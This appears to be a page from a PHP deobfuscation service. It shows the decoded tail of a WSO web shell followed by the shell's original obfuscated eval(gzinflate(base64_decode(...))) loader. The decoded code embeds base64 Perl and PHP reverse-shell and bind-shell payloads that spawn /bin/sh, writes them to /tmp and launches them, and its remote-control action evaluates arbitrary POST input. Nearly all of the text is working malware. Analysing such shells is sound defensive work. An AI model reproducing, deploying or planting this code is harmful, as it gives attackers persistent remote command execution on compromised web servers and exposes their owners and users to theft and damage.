bnRpbCBhIGNvbW1hbmQgaXMgZW5kIGRvd24gJHNvY2ssIG9yIHNvbWUNCiAgIC8vIGNvbW1hbmQgb3V0cHV0IGlzIGF2YWlsYWJsZSBvbiBTVERPVVQgb3IgU1RERVJSDQogICAkcmVhZF9hID0gYXJyYXkoJHNvY2ssICRwaXBlc1sxXSwgJHBpcGVzWzJdKTsNCiAgICRudW1fY2hhbmdlZF9zb2NrZXRzID0gc3RyZWFtX3NlbGVjdCgkcmVhZF9hLCAkd3JpdGVfYSwgJGVycm9yX2EsIG51bGwpOw0KDQogICAvLyBJZiB3ZSBjYW4gcmVhZCBmcm9tIHRoZSBUQ1Agc29ja2V0LCBzZW5kDQogICAvLyBkYXRhIHRvIHByb2Nlc3MncyBTVERJTg0KICAgaWYgKGluX2FycmF5KCRzb2NrLCAkcmVhZF9hKSkgew0KICAgICAgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU09DSyBSRUFEIik7DQogICAgICAkaW5wdXQgPSBmcmVhZCgkc29jaywgJGNodW5rX3NpemUpOw0KICAgICAgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU09DSzogJGlucHV0Iik7DQogICAgICBmd3JpdGUoJHBpcGVzWzBdLCAkaW5wdXQpOw0KICAgfQ0KDQogICAvLyBJZiB3ZSBjYW4gcmVhZCBmcm9tIHRoZSBwcm9jZXNzJ3MgU1RET1VUDQogICAvLyBzZW5kIGRhdGEgZG93biB0Y3AgY29ubmVjdGlvbg0KICAgaWYgKGluX2FycmF5KCRwaXBlc1sxXSwgJHJlYWRfYSkpIHsNCiAgICAgIGlmICgkZGVidWcpIHByaW50aXQoIlNURE9VVCBSRUFEIik7DQogICAgICAkaW5wdXQgPSBmcmVhZCgkcGlwZXNbMV0sICRjaHVua19zaXplKTsNCiAgICAgIGlmICgkZGVidWcpIHByaW50aXQoIlNURE9VVDogJGlucHV0Iik7DQogICAgICBmd3JpdGUoJHNvY2ssICRpbnB1dCk7DQogICB9DQoNCiAgIC8vIElmIHdlIGNhbiByZWFkIGZyb20gdGhlIHByb2Nlc3MncyBTVERFUlINCiAgIC8vIHNlbmQgZGF0YSBkb3duIHRjcCBjb25uZWN0aW9uDQogICBpZiAoaW5fYXJyYXkoJHBpcGVzWzJdLCAkcmVhZF9hKSkgew0KICAgICAgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU1RERVJSIFJFQUQiKTsNCiAgICAgICRpbnB1dCA9IGZyZWFkKCRwaXBlc1syXSwgJGNodW5rX3NpemUpOw0KICAgICAgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU1RERVJSOiAkaW5wdXQiKTsNCiAgICAgIGZ3cml0ZSgkc29jaywgJGlucHV0KTsNCiAgIH0NCn0NCg0KZmNsb3NlKCRzb2NrKTsNCmZjbG9zZSgkcGlwZXNbMF0pOw0KZmNsb3NlKCRwaXBlc1sxXSk7DQpmY2xvc2UoJHBpcGVzWzJdKTsNCnByb2NfY2xvc2UoJHByb2Nlc3MpOw0KDQovLyBMaWtlIHByaW50LCBidXQgZG9lcyBub3RoaW5nIGlmIHdlJ3ZlIGRhZW1vbmlzZWQgb3Vyc2VsZg0KLy8gKEkgY2FuJ3QgZmlndXJlIG91dCBob3cgdG8gcmVkaXJlY3QgU1RET1VUIGxpa2UgYSBwcm9wZXIgZGFlbW9uKQ0KZnVuY3Rpb24gcHJpbnRpdCAoJHN0cmluZykgew0KICAgaWYgKCEkZGFlbW9uKSB7DQogICAgICBwcmludCAiJHN0cmluZ1xuIjsNCiAgIH0NCn0NCg0KPz4=');
$write = fwrite ($file ,$sa);
fclose($file);

	$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
	$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
	echo "<h1>Network tools</h1><div class=content>
	<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
	<span>Bind port to /bin/sh [perl]</span><br/>
	Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
	</form>
	<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
	<span>Back-connect  [perl]</span><br/>
	Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
	</form><br><b><a href=/back2.php>Back-connect[php]</a></b><br>
	
	";
	if(isset($_POST['p1'])) {
		function cf($f,$t) {
			$w=@fopen($f,"w") or @function_exists('file_put_contents');
			if($w)	{
				@fwrite($w,base64_decode($t));
				@fclose($w);
			}
		}
		if($_POST['p1'] == 'bpp') {
			cf("/tmp/bp.pl",$bind_port_p);
			$out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
			echo "<pre class=ml1>$out
".wsoEx("ps aux | grep bp.pl")."</pre>";
		}
		if($_POST['p1'] == 'bcp') {
			cf("/tmp/bc.pl",$back_connect_p);
			$out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
			echo "<pre class=ml1>$out
".wsoEx("ps aux | grep bc.pl")."</pre>";
		}
		
	
	}
	echo '</div>';
	wsoFooter();
}
function actionRC() {
	if(!@$_POST['p1']) {
		$a = array(
			"uname" => php_uname(),
			"php_version" => phpversion(),
			"wso_version" => VERSION,
			"safemode" => @ini_get('safe_mode')
		);
		echo serialize($a);
	} else {
		eval($_POST['p1']);
	}
}
if( empty($_POST['a']) )
	if(isset($default_action) && function_exists('action' . $default_action))
		$_POST['a'] = $default_action;
	else
		$_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
	call_user_func('action' . $_POST['a']);
exit;

Did this file decode correctly?

Original Code

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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